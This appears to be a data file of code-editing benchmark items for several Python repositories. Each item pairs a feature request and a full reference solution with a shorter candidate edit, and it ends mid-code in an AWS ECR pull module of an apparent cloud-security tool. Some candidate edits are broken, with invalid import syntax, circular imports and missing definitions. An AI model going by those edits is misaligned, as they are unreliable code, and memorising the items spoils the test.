    <t>{'called_code_segment': 'from .base import scope, rec_eval, clone, clone_merge, dfs, toposort; from . import stochastic', 'invoking_code_segment': 'from hyperopt.pyll import scope; pyll.rec_eval([below_llik, above_llik, new_node], memo=memo); scope.quniform(1.01, 10, 1); scope.broadcast_best(b_post, below_llik, above_llik); scope.normal(0, 1, rng=rng)', 'feature_description': "Add a new feature that doubles the input value by creating a new scope function 'double' in the pyll module that can be invoked from test files to transform values", 'modified_complete_code': '#file 1: hyperopt/hyperopt/pyll/__init__.py\nfrom .base import Apply\nfrom .base import Literal\nfrom .base import as_apply\nfrom .base import scope\nfrom .base import rec_eval\nfrom .base import clone\nfrom .base import clone_merge\nfrom .base import dfs\nfrom .base import toposort\n\n# -- adds symbols to scope\nfrom . import stochastic\n\n#New: Add double function to scope\ndef _double(x):\n    """Double the input value"""\n    return x * 2\n\n#New: Register the double function with scope\nscope.double = _double\n\n---\n\n#file 2: hyperopt/hyperopt/tests/unit/test_tpe.py\nfrom functools import partial\nimport os\nimport unittest\n\nimport nose\n\nimport numpy as np\n\ntry:\n    import matplotlib.pyplot as plt\nexcept ImportError:\n    pass\n\nfrom hyperopt import pyll\nfrom hyperopt.pyll import scope\n\nfrom hyperopt import Trials\n\nfrom hyperopt.base import miscs_to_idxs_vals, STATUS_OK\n\nfrom hyperopt import hp\n\nfrom hyperopt.tpe import adaptive_parzen_normal_orig\nfrom hyperopt.tpe import GMM1\nfrom hyperopt.tpe import GMM1_lpdf\nfrom hyperopt.tpe import LGMM1\nfrom hyperopt.tpe import LGMM1_lpdf\n\nimport hyperopt.rand as rand\nimport hyperopt.tpe as tpe\nimport hyperopt.atpe as atpe\nfrom hyperopt import fmin\n\nfrom .test_domains import domain_constructor, CasePerDomain, NonCategoricalCasePerDomain\n\nDO_SHOW = int(os.getenv("HYPEROPT_SHOW", "0"))\n\n\ndef passthrough(x):\n    return x\n\n\n#New: Add a helper function that uses the double feature\ndef double_value(x):\n    """Helper function to double a value using scope.double"""\n    return scope.double(x)\n\n\n#Modify: Update opt_q_uniform to use the new double feature\n@domain_constructor(loss_target=0)\ndef opt_q_uniform(target):\n    rng = np.random.default_rng(123)\n    x = hp.quniform("x", 1.01, 10, 1)\n    #Modify: Apply double transformation to x\n    doubled_x = scope.double(x)\n    return {\n        "loss": (doubled_x - target) ** 2 + scope.normal(0, 1, rng=rng),\n        "status": STATUS_OK,\n    }\n\n\n#Modify: Update TestOptQUniform.work method to demonstrate double feature\nclass TestOptQUniform:\n    show_steps = False\n    show_vars = DO_SHOW\n    LEN = 25\n\n    def work(self, **kwargs):\n        self.__dict__.update(kwargs)\n        bandit = opt_q_uniform(self.target)\n        prior_weight = 2.5\n        gamma = 0.20\n        algo = partial(\n            tpe.suggest,\n            prior_weight=prior_weight,\n            n_startup_jobs=2,\n            n_EI_candidates=128,\n            gamma=gamma,\n        )\n\n        trials = Trials()\n        fmin(\n            passthrough, space=bandit.expr, algo=algo, trials=trials, max_evals=self.LEN\n        )\n        if self.show_vars:\n            import hyperopt.plotting\n\n            hyperopt.plotting.main_plot_vars(trials, bandit, do_show=1)\n\n        idxs, vals = miscs_to_idxs_vals(trials.miscs)\n        idxs = idxs["x"]\n        vals = vals["x"]\n\n        losses = trials.losses()\n\n        from hyperopt.tpe import ap_split_trials\n        from hyperopt.tpe import adaptive_parzen_samplers\n\n        qu = scope.quniform(1.01, 10, 1)\n        #New: Create doubled version for comparison\n        qu_doubled = scope.double(qu)\n        fn = adaptive_parzen_samplers["quniform"]\n        fn_kwargs = dict(size=(4,), rng=np.random)\n        s_below = pyll.Literal()\n        s_above = pyll.Literal()\n        b_args = [s_below, prior_weight] + qu.pos_args\n        b_post = fn(*b_args, **fn_kwargs)\n        a_args = [s_above, prior_weight] + qu.pos_args\n        a_post = fn(*a_args, **fn_kwargs)\n\n        fn_lpdf = getattr(scope, a_post.name + "_lpdf")\n        print(fn_lpdf)\n        a_kwargs = {n: a for n, a in a_post.named_args if n not in ("rng", "size")}\n        b_kwargs = {n: a for n, a in b_post.named_args if n not in ("rng", "size")}\n        below_llik = fn_lpdf(*([b_post] + b_post.pos_args), **b_kwargs)\n        above_llik = fn_lpdf(*([b_post] + a_post.pos_args), **a_kwargs)\n        new_node = scope.broadcast_best(b_post, below_llik, above_llik)\n\n        print("=" * 80)\n\n        do_show = self.show_steps\n\n        for ii in range(2, 9):\n            if ii &gt; len(idxs):\n                break\n            print("-" * 80)\n            print("ROUND", ii)\n            print("-" * 80)\n            all_vals = [2, 3, 4, 5, 6, 7, 8, 9, 10]\n            below, above = ap_split_trials(\n                idxs[:ii], vals[:ii], idxs[:ii], losses[:ii], gamma\n            )\n            below = below.astype("int")\n            above = above.astype("int")\n            print("BB0", below)\n            print("BB1", above)\n            memo = {b_post: all_vals, s_below: below, s_above: above}\n            bl, al, nv = pyll.rec_eval([below_llik, above_llik, new_node], memo=memo)\n            print("BB2", dict(list(zip(all_vals, bl - al))))\n            print("BB3", dict(list(zip(all_vals, bl))))\n            print("BB4", dict(list(zip(all_vals, al))))\n            print("ORIG PICKED", vals[ii])\n            print("PROPER OPT PICKS:", nv)\n\n            if do_show:\n                plt.subplot(8, 1, ii)\n                plt.scatter(all_vals, bl, c="g")\n                plt.scatter(all_vals, al, c="r")\n        if do_show:\n            plt.show()\n\n    def test4(self):\n        self.work(target=4, LEN=100)\n\n    def test2(self):\n        self.work(target=2, LEN=100)\n\n    def test6(self):\n        self.work(target=6, LEN=100)\n\n    def test10(self):\n        self.work(target=10, LEN=100)'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def passthrough(x):\n    #Modify: Invoke new feature function\n    return new_feature_function(x)\n\n#New: Import new feature function\nfrom #file 3 import new_feature_function', '#file 2': 'fmin(\n    passthrough,\n    space=bandit.expr,\n    algo=partial(tpe.suggest, n_EI_candidates=3),\n    trials=trials,\n    max_evals=10,\n)', '#file 3': 'def new_feature_function(x):\n    # New feature implementation\n    return x * 2'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'InvalidCredentialsException = HTTPException(status_code=HTTP_401_UNAUTHORIZED, detail="Invalid credentials", headers={"WWW-Authenticate": "Bearer"})', 'invoking_code_segment': 'raise InvalidCredentialsException in login() function', 'feature_description': 'Add role-based access control to the login endpoint by introducing a new exception for insufficient permissions and modifying the login flow to validate user roles before token generation', 'modified_complete_code': '# File 1: fastapi_login/fastapi_login/exceptions.py\nfrom fastapi import HTTPException\nfrom starlette.status import HTTP_400_BAD_REQUEST, HTTP_401_UNAUTHORIZED, HTTP_403_FORBIDDEN\n\n# Reference: https://datatracker.ietf.org/doc/html/rfc6749#section-5.2\n\nInvalidCredentialsException = HTTPException(\n    status_code=HTTP_401_UNAUTHORIZED,\n    detail="Invalid credentials",\n    headers={"WWW-Authenticate": "Bearer"},\n)\n\nInsufficientScopeException = HTTPException(\n    status_code=HTTP_400_BAD_REQUEST,\n    detail="Insufficient scope",\n    headers={"WWW-Authenticate": "Bearer"},\n)\n\n# New: Add exception for insufficient role/permissions\nInsufficientPermissionException = HTTPException(\n    status_code=HTTP_403_FORBIDDEN,\n    detail="Insufficient permissions for this operation",\n    headers={"WWW-Authenticate": "Bearer"},\n)\n\n# File 2: fastapi_login/examples/sqlalchemy/app.py\nfrom fastapi import Depends, FastAPI, HTTPException\nfrom fastapi.security import OAuth2PasswordRequestForm\nfrom fastapi_login.exceptions import InvalidCredentialsException, InsufficientPermissionException\nfrom sqlalchemy import inspect\n\nfrom config import DEFAULT_SETTINGS\nfrom crud_models import UserCreate, UserResponse\nfrom db import get_db, Base, engine\nfrom db_actions import get_user, create_user\nfrom security import manager, verify_password\n\napp = FastAPI()\n\n# New: Define required roles for login (can be configured)\nREQUIRED_LOGIN_ROLES = [\'user\', \'admin\']\n\n@app.on_event("startup")\ndef setup():\n    print("Creating db tables...")\n    Base.metadata.create_all(bind=engine)\n    inspection = inspect(engine)\n    print(f"Created {len(inspection.get_table_names())} tables: {inspection.get_table_names()}")\n\n\n@app.post("/auth/register")\ndef register(user: UserCreate, db=Depends(get_db)):\n    if get_user(user.email) is not None:\n        raise HTTPException(status_code=400, detail="A user with this email already exists")\n    else:\n        db_user = create_user(db, user)\n        return UserResponse(id=db_user.id, email=db_user.email, is_admin=db_user.is_admin)\n\n\n@app.post(DEFAULT_SETTINGS.token_url)\ndef login(data: OAuth2PasswordRequestForm = Depends()):\n    email = data.username\n    password = data.password\n\n    user = get_user(email)\n    if user is None:\n        raise InvalidCredentialsException\n    elif not verify_password(password, user.password):\n        raise InvalidCredentialsException\n    \n    # Modify: Add role-based access control check\n    user_role = getattr(user, \'role\', \'user\')\n    if user_role not in REQUIRED_LOGIN_ROLES:\n        raise InsufficientPermissionException\n\n    access_token = manager.create_access_token(\n        data=dict(sub=user.email, role=user_role)\n    )\n    return {\'access_token\': access_token, \'token_type\': \'Bearer\'}\n\n\n@app.get("/private")\ndef private_route(user=Depends(manager)):\n    return {"detail": f"Welcome {user.email}"}\n\n\nif __name__ == "__main__":\n    import uvicorn\n\n    uvicorn.run("app:app")'}</t>
  </si>
  <si>
    <t>{'#file 1': "from fastapi import HTTPException  #Modify\nfrom db_actions import verify_user_role  #New\n\n#Modify\ndef get_user(email):\n    user = User.query.filter(User.email == email).first()\n    if user and not verify_user_role(user, required_role=True):  #New\n        raise HTTPException(status_code=403, detail='Insufficient permissions')  #New\n    return user", '#file 2': "from fastapi import Depends, FastAPI, HTTPException\nfrom fastapi.security import OAuth2PasswordRequestForm\nfrom fastapi_login.exceptions import InvalidCredentialsException\nfrom db_actions import get_user, verify_user_role  #Modify\nfrom security import manager, verify_password\n\napp = FastAPI()\n\n@app.post(DEFAULT_SETTINGS.token_url)\ndef login(data: OAuth2PasswordRequestForm = Depends()):\n    email = data.username\n    password = data.password\n\n    user = get_user(email)  # we are using the same function to retrieve the user\n    if user is None:\n        raise InvalidCredentialsException  # you can also use your own HTTPException\n    elif not verify_password(password, user.password):\n        raise InvalidCredentialsException\n\n    #New\n    if not verify_user_role(user, required_role=True):\n        raise HTTPException(status_code=403, detail='Insufficient permissions')\n\n    access_token = manager.create_access_token(\n        data=dict(sub=user.email)\n    )\n    return {'access_token': access_token, 'token_type': 'Bearer'}", '#file 3': "from fastapi import HTTPException\n\ndef verify_user_role(user, required_role):\n    if user.is_admin != required_role:\n        raise HTTPException(status_code=403, detail='Insufficient permissions')\n    return True"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'Request class methods: _prepare_headers(), _connect(), send(), getresponse()', 'invoking_code_segment': 'from .request import Request in __init__.py', 'feature_description': 'Enhanced logging and custom headers for debugging and additional functionality. This feature adds comprehensive logging capabilities to track request lifecycle, custom header support for debugging purposes, and improved error handling with detailed logging information.', 'modified_complete_code': '# File 1: dialogflow-python-client/apiai/requests/request.py\n# -*- coding:utf8 -*-\n# !/usr/bin/env python\n# Copyright 2017 Google Inc.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urllib\nimport os\n#New: Import logging module for enhanced logging\nimport logging\n\ntry:  # Python 3\n    from http.client import HTTPSConnection\nexcept ImportError:\n    from httplib import HTTPSConnection\n\ntry:\n    import urllib.parse\nexcept ImportError:\n    import urllib\n\n#New: Configure logger for debugging\nlogger = logging.getLogger(__name__)\n\nclass Request(object):\n    """Abstract request class\n    Contain share information for all requests."""\n\n    _connection_class = HTTPSConnection\n    #New: Class variable for custom debug headers\n    _custom_debug_headers = {}\n\n    @property\n    def client_access_token(self):\n        """client access token provided by http://api.ai/"""\n        return self._client_access_token\n\n    @client_access_token.setter\n    def client_access_token(self, client_access_token):\n        self._client_access_token = client_access_token\n\n    def __init__(self,\n                 client_access_token,\n                 base_url,\n                 path,\n                 query_parameters=[],\n                 #New: Add debug_mode and custom_headers parameters\n                 debug_mode=False,\n                 custom_headers=None\n                 ):\n        super(Request, self).__init__()\n\n        self.base_url = base_url\n        self.path = path\n        self.query_parameters = query_parameters\n        #New: Store debug mode and custom headers\n        self.debug_mode = debug_mode\n        self.custom_headers = custom_headers or {}\n\n        self.client_access_token = client_access_token\n\n        #New: Log initialization\n        if self.debug_mode:\n            logger.debug(f\'Initializing Request with base_url={base_url}, path={path}\')\n\n        self._prepare_proxy()\n        self._prepare_request()\n\n    def _prepare_entities(self):\n        if self.entities:\n            return list(map(lambda x: x._to_dict(), self.entities))\n        return None\n\n    def _prepare_proxy(self):\n\n        self.proxy_enabled = False\n\n        if os.environ.get("https_proxy"):\n            self.proxy_enabled = True\n            https_proxy = os.environ["https_proxy"]\n\n            # As proxies are set like "export https_proxy=$http_proxy"\n            # so it might start with \'https\' or \'http\'\n\n            https_proxy = https_proxy.replace("https://", "").rstrip("/")\n            https_proxy = https_proxy.replace("http://", "").rstrip("/")\n            (self.proxy_host, self.proxy_port) = https_proxy.split(":")\n            self.proxy_port = int(self.proxy_port)\n            #New: Log proxy configuration\n            if self.debug_mode:\n                logger.debug(f\'Proxy enabled: {self.proxy_host}:{self.proxy_port}\')\n\n    def _prepare_request(self, debug=False):\n        if(self.proxy_enabled):\n            self._connection = self._connection_class(\n                self.proxy_host,\n                self.proxy_port\n            )\n\n            self._connection.set_tunnel(self.base_url)\n        else:\n            self._connection = self._connection_class(self.base_url)\n        #New: Log connection preparation\n        if self.debug_mode:\n            logger.debug(f\'Connection prepared for {self.base_url}\')\n\n    def _connect(self):\n        #New: Log connection attempt\n        if self.debug_mode:\n            logger.debug(\'Attempting to connect to server\')\n        \n        self._connection.connect()\n\n        query = None\n\n        try:\n            query = urllib.urlencode(self.query_parameters)\n        except AttributeError:\n            query = urllib.parse.urlencode(self.query_parameters)\n\n        full_path = self.path + \'?\' + query\n        #New: Log full path\n        if self.debug_mode:\n            logger.debug(f\'Full request path: {full_path}\')\n\n        self._connection.putrequest(\'POST\', full_path, skip_accept_encoding=1)\n\n        headers = {\n            \'Accept\': \'application/json\',\n            \'Authorization\': (\'Bearer %s\' % self.client_access_token)\n        }\n\n        #Modify: Merge custom headers with default headers\n        headers.update(self._prepare_headers())\n        headers.update(self.custom_headers)\n\n        #New: Log headers being sent (excluding sensitive data)\n        if self.debug_mode:\n            safe_headers = {k: v if k != \'Authorization\' else \'***\' for k, v in headers.items()}\n            logger.debug(f\'Request headers: {safe_headers}\')\n\n        for header_key, header_value in headers.items():\n            self._connection.putheader(header_key, header_value)\n\n        self._connection.endheaders()\n\n        begin = self._prepage_begin_request_data()\n\n        if begin is not None:\n            #New: Log data being sent\n            if self.debug_mode:\n                logger.debug(f\'Sending begin request data of length: {len(begin)}\')\n            self.send(begin.encode(\'utf-8\'))\n\n    def send(self, chunk):\n        """Send a given data chunk of voice data."""\n        #New: Log chunk being sent\n        if self.debug_mode:\n            logger.debug(f\'Sending chunk of size: {len(chunk)} bytes\')\n\n        if getattr(self._connection, \'sock\', None) is None:\n            self._connect()\n\n        self._connection.send(chunk)\n\n    def _beforegetresponce(self):\n        pass\n\n    def getresponse(self):\n        """Send all data and wait for response.\n        """\n        #New: Log response retrieval\n        if self.debug_mode:\n            logger.debug(\'Preparing to get response from server\')\n\n        if getattr(self._connection, \'sock\', None) is None:\n            self._connect()\n\n        end = self._prepage_end_request_data()\n\n        if end is not None:\n            #New: Log end data being sent\n            if self.debug_mode:\n                logger.debug(f\'Sending end request data of length: {len(end)}\')\n            self.send(end.encode(\'utf-8\'))\n\n        self._beforegetresponce()\n\n        response = self._connection.getresponse()\n        #New: Log response status\n        if self.debug_mode:\n            logger.debug(f\'Response status: {response.status}\')\n        return response\n\n    #New: Method to set custom debug headers\n    def set_custom_headers(self, headers_dict):\n        """Set custom headers for debugging and additional functionality."""\n        self.custom_headers.update(headers_dict)\n        if self.debug_mode:\n            logger.debug(f\'Custom headers updated: {list(headers_dict.keys())}\')\n\n    #New: Method to enable/disable debug mode\n    def set_debug_mode(self, enabled):\n        """Enable or disable debug logging."""\n        self.debug_mode = enabled\n        if enabled:\n            logger.setLevel(logging.DEBUG)\n            logger.debug(\'Debug mode enabled\')\n        else:\n            logger.setLevel(logging.INFO)\n\n    def _prepare_headers(self):\n        raise NotImplementedError("Please Implement this method")\n\n    def _prepage_begin_request_data(self):\n        raise NotImplementedError("Please Implement this method")\n\n    def _prepage_end_request_data(self):\n        raise NotImplementedError("Please Implement this method")\n\n\n# File 2: dialogflow-python-client/apiai/requests/__init__.py\n# -*- coding:utf8 -*-\n# !/usr/bin/env python\n# Copyright 2017 Google Inc.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License.\n\nfrom .request import Request\nfrom .query import QueryRequest\nfrom .query import TextRequest\nfrom .query import VoiceRequest\nfrom .query import events\n\nfrom .user_entities import UserEntitiesRequest\n\n#New: Import logging for module-level configuration\nimport logging\n\n"""\napiai\n~~~~~~~~~~~~~~~~\nThis module provides a ApiAI classes to manage requests.\n"""\n\n#New: Configure module logger\nlogger = logging.getLogger(__name__)\n\n#New: Function to enable debug logging across all request classes\ndef enable_debug_logging(level=logging.DEBUG):\n    """Enable debug logging for all request classes."""\n    logging.basicConfig(level=level, format=\'%(asctime)s - %(name)s - %(levelname)s - %(message)s\')\n    logger.debug(\'Debug logging enabled for apiai.requests module\')\n\n#New: Function to create request with debug capabilities\ndef create_request_with_debug(request_class, *args, debug_mode=True, custom_headers=None, **kwargs):\n    """Factory function to create request instances with debug and custom headers support."""\n    kwargs[\'debug_mode\'] = debug_mode\n    kwargs[\'custom_headers\'] = custom_headers or {}\n    return request_class(*args, **kwargs)\n\n__all__ = [\n    \'Request\',\n    \'QueryRequest\',\n    \'TextRequest\',\n    \'VoiceRequest\',\n    \'UserEntitiesRequest\',\n    \'EventRequest\',\n    \'Event\',\n    \'events\',\n    #New: Export new debug utilities\n    \'enable_debug_logging\',\n    \'create_request_with_debug\'\n]'}</t>
  </si>
  <si>
    <t>{'#file 1': 'class Request(object):\n    ...\n    def send(self, chunk):\n        """Send a given data chunk of voice data."""\n        if getattr(self._connection, \'sock\', None) is None:\n            self._connect()\n        self._connection.send(chunk)  # Modify: Original send method', '#file 2': 'from .request import EnhancedRequest  # New: Import EnhancedRequest\n\nclass VoiceRequest(QueryRequest):\n    ...\n    def send(self, chunk):\n        super(VoiceRequest, self).send(chunk)  # Modify: Use EnhancedRequest', '#file 3': 'class EnhancedRequest(Request):\n    def send(self, chunk):\n        # New: Enhanced logging for debugging\n        print(f"Sending chunk of size: {len(chunk)}")\n        super(EnhancedRequest, self).send(chunk)\n\n    def _prepare_headers(self):\n        headers = super(EnhancedRequest, self)._prepare_headers()\n        headers[\'X-Custom-Header\'] = \'EnhancedRequest\'\n        return headers'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'MainWindow class initialization and instantiation in sloth/sloth/gui/__init__.py and sloth/sloth/gui/labeltool.py', 'invoking_code_segment': 'wnd = MainWindow(labeltool) in sloth/tests/model_test.py', 'feature_description': 'Add a custom feature to the MainWindow class that executes a specific action when triggered, such as a custom menu action or button that performs a defined operation on the label tool.', 'modified_complete_code': '#File 1: sloth/sloth/gui/__init__.py\nfrom .labeltool import MainWindow\n\n#File 1: sloth/sloth/gui/labeltool.py (assumed location of MainWindow class)\n#Modify - Add custom action method to MainWindow class\nclass MainWindow(QMainWindow):\n    def __init__(self, labeltool):\n        super(MainWindow, self).__init__()\n        self.labeltool = labeltool\n        self.initUI()\n        #New - Initialize custom feature\n        self.setupCustomFeature()\n    \n    def initUI(self):\n        # Existing UI initialization code\n        pass\n    \n    #New - Custom feature setup method\n    def setupCustomFeature(self):\n        """Setup custom feature with action trigger"""\n        self.customAction = QAction(\'Execute Custom Action\', self)\n        self.customAction.triggered.connect(self.executeCustomAction)\n        # Add to menu or toolbar as needed\n        if hasattr(self, \'menuBar\'):\n            customMenu = self.menuBar().addMenu(\'Custom\')\n            customMenu.addAction(self.customAction)\n    \n    #New - Custom action execution method\n    def executeCustomAction(self):\n        """Execute the specific custom action"""\n        if self.labeltool and hasattr(self.labeltool, \'_model\'):\n            # Perform custom operation on the model\n            print(\'Custom action executed on model\')\n            # Add specific action logic here\n            self.labeltool._model.customOperation()\n\n#File 2: sloth/tests/model_test.py\n#!/usr/bin/env python\nimport os, sys\nfrom PyQt4.QtGui import QApplication, QAction\nfrom sloth.gui import MainWindow\nfrom sloth.core.labeltool import LabelTool\nfrom sloth import APP_NAME, ORGANIZATION_NAME, ORGANIZATION_DOMAIN\nfrom pymodeltest.modeltest import ModelTest\n\nSAMPLE_DATA = os.path.join(os.path.dirname(__file__), \'data\', \'example1_labels.json\')\n\nif __name__ == \'__main__\':\n    app = QApplication(sys.argv)\n    app.setOrganizationName(ORGANIZATION_NAME)\n    app.setOrganizationDomain(ORGANIZATION_DOMAIN)\n    app.setApplicationName(APP_NAME)\n\n    labeltool = LabelTool()\n    if len(sys.argv) &lt; 2:\n        sys.argv.append(SAMPLE_DATA)\n    labeltool.execute_from_commandline(sys.argv)\n    labeltool.modeltest = ModelTest(labeltool._model, labeltool)\n\n    #Modify - Create MainWindow with custom feature support\n    wnd = MainWindow(labeltool)\n    labeltool._mainwindow = wnd\n    #New - Connect custom feature trigger if needed\n    if hasattr(wnd, \'customAction\'):\n        wnd.customAction.setEnabled(True)\n    wnd.show()\n\n    sys.exit(app.exec_())'}</t>
  </si>
  <si>
    <t>{'#file 1': 'from PyQt4.QtGui import QMainWindow  #Modify\nfrom .custom_feature import CustomFeature  #New\n\nclass MainWindow(QMainWindow):\n    def __init__(self, labeltool):\n        super(MainWindow, self).__init__()\n        self.labeltool = labeltool\n        self.custom_feature = CustomFeature(labeltool)  #New\n        self.custom_feature.execute_custom_feature()  #New', '#file 2': "from sloth.gui import MainWindow  #Modify\nfrom sloth.core.labeltool import LabelTool  #Modify\nfrom sloth import APP_NAME, ORGANIZATION_NAME, ORGANIZATION_DOMAIN  #Modify\nfrom pymodeltest.modeltest import ModelTest  #Modify\nfrom .custom_feature import CustomFeature  #New\n\nif __name__ == '__main__':\n    app = QApplication(sys.argv)\n    app.setOrganizationName(ORGANIZATION_NAME)\n    app.setOrganizationDomain(ORGANIZATION_DOMAIN)\n    app.setApplicationName(APP_NAME)\n\n    labeltool = LabelTool()\n    if len(sys.argv) &lt; 2:\n        sys.argv.append(SAMPLE_DATA)\n    labeltool.execute_from_commandline(sys.argv)\n    labeltool.modeltest = ModelTest(labeltool._model, labeltool)\n\n    wnd = MainWindow(labeltool)\n    labeltool._mainwindow = wnd\n    wnd.show()\n\n    custom_feature = CustomFeature(labeltool)  #New\n    custom_feature.execute_custom_feature()  #New\n\n    sys.exit(app.exec_())\n", '#file 3': "class CustomFeature:\n    def __init__(self, labeltool):\n        self.labeltool = labeltool\n\n    def execute_custom_feature(self):\n        print('Custom feature executed')"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'ExpensiveClass class initialization in services.py', 'invoking_code_segment': 'scoped_fixture() function that instantiates ExpensiveClass in 16_scoped_and_meta_fixtures_test.py', 'feature_description': 'Introduce a caching mechanism to reduce the number of expensive database calls by implementing a decorator-based cache for the db_service function and a singleton pattern for ExpensiveClass initialization', 'modified_complete_code': '# services.py\nimport time\nfrom collections import namedtuple\nfrom functools import wraps\n\n# New: Cache decorator for memoizing function results\ndef cache_result(func):\n    """Decorator to cache function results based on query parameters"""\n    cached_data = {}\n    \n    @wraps(func)\n    def wrapper(query_parameters):\n        # Convert dict to tuple for hashability\n        cache_key = str(query_parameters)\n        if cache_key not in cached_data:\n            cached_data[cache_key] = func(query_parameters)\n        return cached_data[cache_key]\n    \n    return wrapper\n\n# New: Singleton pattern for ExpensiveClass\nclass ExpensiveClassMeta(type):\n    """Metaclass to implement singleton pattern for ExpensiveClass"""\n    _instances = {}\n    \n    def __call__(cls, *args, **kwargs):\n        if cls not in cls._instances:\n            cls._instances[cls] = super(ExpensiveClassMeta, cls).__call__(*args, **kwargs)\n        return cls._instances[cls]\n\nclass ExpensiveClass(object, metaclass=ExpensiveClassMeta):\n    """A fake Class that takes a long time to fully initialize (now cached via singleton)"""\n    \n    def __init__(self):\n        if not hasattr(self, \'_initialized\'):\n            print("(Initializing ExpensiveClass instance...)")\n            time.sleep(0.2)\n            print("(ExpensiveClass instance complete!)")\n            self._initialized = True\n\nFakeRow = namedtuple("FakeRow", ("id", "name", "value"))\n\n# Modify: Add cache decorator to db_service\n@cache_result\ndef db_service(query_parameters):\n    """A fake DB service that takes a remarkably long time to yield results (now cached)"""\n    print("(Doing expensive database stuff!)")\n    time.sleep(5.0)\n    data = [FakeRow(0, "Foo", 19.95), FakeRow(1, "Bar", 1.99), FakeRow(2, "Baz", 9.99)]\n    print("(Done doing expensive database stuff)")\n    return data\n\ndef count_service(query_parameters):\n    print("count_service: Performing a query (and counting the results)...")\n    data = db_service(query_parameters)\n    count = len(data)\n    print("Found {} result(s)!".format(count))\n    return count\n\nDATA_SET_A = {"Foo": "Bar", "Baz": [5, 7, 11], "Qux": {"A": "Boston", "B": "Python", "C": "TDD"}}\nDATA_SET_B = DATA_SET_A\nDATA_SET_C = {"Foo": "Bar", "Baz": [3, 5, 7], "Qux": {"A": "Boston", "B": "Python", "C": "TDD"}}\n\n# 16_scoped_and_meta_fixtures_test.py\nfrom pytest import fixture, mark\nfrom other_code.services import ExpensiveClass\n\n# Modify: Updated fixture to use cached ExpensiveClass singleton\n@fixture(scope="module", autouse=True)\ndef scoped_fixture():\n    """Scoping affects how often fixtures are (re)initialized. Now uses cached singleton."""\n    print("\\n(Begin Module-scoped fixture)")\n    yield ExpensiveClass()\n    print("\\n(End Module-scoped fixture)")\n\n@mark.parametrize("x", range(1, 51))\ndef test_scoped_fixtures(x):\n    """A (hopefully fast!) test, to be run with fifty different parameters..."""\n    print("\\n   Running test_scoped_fixture")'}</t>
  </si>
  <si>
    <t># file 1: other_code/services.py
from collections import namedtuple
from other_code.cache_service import cached_db_service  # New
FakeRow = namedtuple("FakeRow", ("id", "name", "value"))
#Modify
def count_service(query_parameters):
    print("count_service: Performing a query (and counting the results)...")
    data = cached_db_service(query_parameters)  # Modified to use cached_db_service
    count = len(data)
    print("Found {} result(s)!".format(count))
    return count
# file 2: tests/16_scoped_and_meta_fixtures_test.py
from pytest import fixture, mark
from other_code.services import ExpensiveClass
@fixture(scope="module", autouse=True)
def scoped_fixture():
    """
    Scoping affects how often fixtures are (re)initialized
    """
    print("\n(Begin Module-scoped fixture)")
    yield ExpensiveClass()
    print("\n(End Module-scoped fixture)")
@mark.parametrize("x", range(1, 51))
def test_scoped_fixtures(x):
    """
    A (hopefully fast!) test, to be run with fifty different parameters...
    """
    print("\n   Running test_scoped_fixture")
# file 3: other_code/cache_service.py
from other_code.services import db_service  # New
#New
def cached_db_service(query_parameters):
    """
    A cached version of the db_service to reduce expensive calls.
    """
    print("(Using cached database stuff!)")
    # Simulate caching logic here
    return db_service(query_parameters)</t>
  </si>
  <si>
    <t>{'called_code_segment': "def main(args):\n    data = {\n        'count': 0,\n        'payload': {\n            'aws_region': None,\n            'aws_ecr_repository_uri': None,\n            'aws_ecr_repository_tags': []\n        }\n    }\n\n    if args.get('ecr_repos'):\n        ecr_pull_all_repos(args, data)\n    else:\n        ecr_pull(args, data)\n\n    return data", 'invoking_code_segment': "elif PULL_ECR_REPOS in answers['main_menu']:\n            cli_answers = self.extentions['aws'].ask_ecr_pull_repos()\n            self.print_module_running(ecr__pull_repos.module_info['name'])\n            data = ecr__pull_repos.main(cli_answers)\n            self.print_module_summary(data, ecr__pull_repos)", 'feature_description': 'Add logging functionality to record ECR repository pull activities including timestamps, repository URIs, tags, and pull status (success/failure)', 'modified_complete_code': '# FILE 1: ccat/modules/ecr__pull_repos/main.py\n#!/usr/bin/env python3\nimport base64\nimport json\nimport sys\n#New\nimport logging\nfrom datetime import datetime\n\nimport fire\nimport boto3\nimport docker\n\n#New\n# Configure logging\nlogging.basicConfig(\n    level=logging.INFO,\n    format=\'%(asctime)s - %(name)s - %(levelname)s - %(message)s\',\n    handlers=[\n        logging.FileHandler(\'ecr_pull_activities.log\'),\n        logging.StreamHandler()\n    ]\n)\nlogger = logging.getLogger(__name__)\n\nmodule_info = {\n    \'name\': \'ecr__pull_repos\',\n    \'author\': \'Jack Ganbold of Rhino Security Labs\',\n    \'category\': \'Container\',\n    \'one_liner\': \'Pulls ECR repositories.\',\n    \'description\': \'Pulls ECR repositories.\',\n    \'services\': [\'ECR\'],\n    \'prerequisite_modules\': [],\n    \'external_dependencies\': [],\n    \'arguments_to_autocomplete\': [],\n}\n\nDOCKER_LOGIN_SUCCEEDED = \'Login Succeeded\'\nDOCKER_BASE_URL = \'unix:///var/run/docker.sock\'\n\ndef get_aws_session(aws_cli_profile, aws_region):\n    return boto3.session.Session(profile_name=aws_cli_profile, region_name=aws_region)\n\ndef docker_login(docker_client ,username, password, registry):\n    login_response = docker_client.login(username, password, registry=registry)\n    #Modify\n    logger.info(f\'Docker login attempt to registry: {registry}\')\n    return login_response\n\ndef get_docker_username_password_registry(token):\n    docker_username, docker_password = base64.b64decode(token[\'authorizationData\'][0][\'authorizationToken\']).decode().split(\':\')\n    docker_registry = token[\'authorizationData\'][0][\'proxyEndpoint\']\n    return (docker_username, docker_password, docker_registry)\n\ndef docker_pull(docker_client, repo):\n    #Modify\n    logger.info(f\'Attempting to pull repository: {repo}\')\n    try:\n        docker_pull_response = docker_client.images.pull(repo)\n        logger.info(f\'Successfully pulled repository: {repo}\')\n        return docker_pull_response\n    except Exception as e:\n        logger.error(f\'Failed to pull repository {repo}: {str(e)}\')\n        raise\n\ndef ecr_pull_all_repos(args, data):\n    ecr_repos = args.get(\'ecr_repos\')\n    count = 0\n    #Modify\n    logger.info(\'Starting ECR pull all repos operation\')\n    \n    try:\n        if ecr_repos.get(\'aws_regions\'):\n            for region in ecr_repos.get(\'aws_regions\'):\n                #Modify\n                logger.info(f\'Processing region: {region}\')\n                aws_session = get_aws_session(args[\'aws_cli_profile\'], region)\n                ecr_client = 